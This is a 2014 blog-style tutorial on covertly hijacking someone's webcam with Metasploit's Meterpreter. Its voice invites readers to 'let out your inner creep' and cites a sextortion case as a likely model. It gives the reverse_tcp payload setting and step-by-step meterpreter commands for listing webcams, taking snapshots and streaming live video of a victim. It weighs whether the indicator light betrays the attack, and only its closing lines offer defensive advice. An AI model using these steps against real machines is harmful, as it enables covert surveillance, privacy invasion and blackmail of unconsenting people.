Updated on: January 15, 2014
It’s time to let out your inner creep. In this tutorial, we’ll be taking a look at how we can hack a webcam remotely and take a peek at what’s going on at the other side. We’ll use the powerful Meterpreter to hack into the victim’s webcam. We’ll take full control of the webcam, turn it on and get snapshots without anyone ever finding out.
In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA 2013. He found a vulnerability in her computer (perhaps some outdated software), took a few clicks from the webcam and blackmailed the victim to send more photos. While the exact method he used is unknown, it’s very likely the same as what we’ll be trying out here. The point of this tutorial is to show just how easy it really is, a proof of concept. While developing your own hacks and discovering loopholes is a whole different level of hacking, quite a lot of hacking can be done just by being in ‘the know’: knowing common vulnerabilities and the tools to exploit them. If successful, it can lead to things like getting your webcam hacked or worse. Finally, we’ll see exactly why you should find some black tape and tape over your camera right now.
Our best friend Meterpreter is going to help us with this hack. With Meterpreter we can install a keylogger, hack the webcam and the list goes on and on. You can basically do almost anything that you can do on your own computer, to your victim. All we need for this hack, is to first break in with Metasploit and install meterpreter on their system. How do we do that?
After picking an attack module to exploit a vulnerability, we have the option to set a payload. The payload tells metasploit what to do on the victim’s computer once it breaks in. Meterpreter is a payload. The command usually looks like:
Set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam, in this case. We can also get our meterpreter session by using exploits like Aurora (for IE6). After getting the meterpreter session in our command, you can follow the steps below to hack the webcam.
Step 1: Find if there is a webcam.
Metasploit’s Meterpreter has a built-in module for searching and controlling the remote system’s webcam (Because apparently there are so many creepy hackers that we now have this hack at our fingertips). We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
If a webcam was found, Meterpreter will them all out. Usually we just find one.
Step 2: Say Cheese!
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
If all went fine a picture will be saved in the directory: /opt/framework3/msf3 We can simply go there and see what we got. We can’t do anything about the quality of the image, it all depends on the webcam. Still, better than nothing, right?
Step 3: Streaming video.
So we got a picture, let’s see how to get a live video stream. We can do this by typing the command below: (We’re using –p parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim’s webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what’s going on at the other end in live video feed.
Another thing that deservers mention here is the little light that is often found next to many laptop cameras and on some separate webcams too. Will the light be turned on by this hack? It depends on the way the camera manufacture implemented the ‘take a photo’ and ‘take a video’ functions and on which software is set as default to use the camera. So this hack is not all that risk-free. But then again, what’s life without a little risk? (Just kidding, people go to jail for this. Be careful.)
In 3 small commands we can peek into our victim’s webcam. How to make sure this doesn’t happen to you? This hack has a very complicated and highly technical flaw: It can be completely stopped by something as little as a tissue on the webcam.
So the easiest solution is to just cover up your webcam. Nowadays, webcams with a sliding cover are becoming more and more popular. But this is just treating the symptom, not the disease. If someone across the globe can control your webcam, it means that your system has some vulnerable software. The hacker might think, ‘if not the webcam, maybe I’ll settle for a keylogger’, which is just as easy. You need to stop the attacker’s metasploit from ever getting access to your system. The only way to do that is to keep all your applications up to date and keep an eye on the news for zero day exploits so your precious computer can live to hack another day.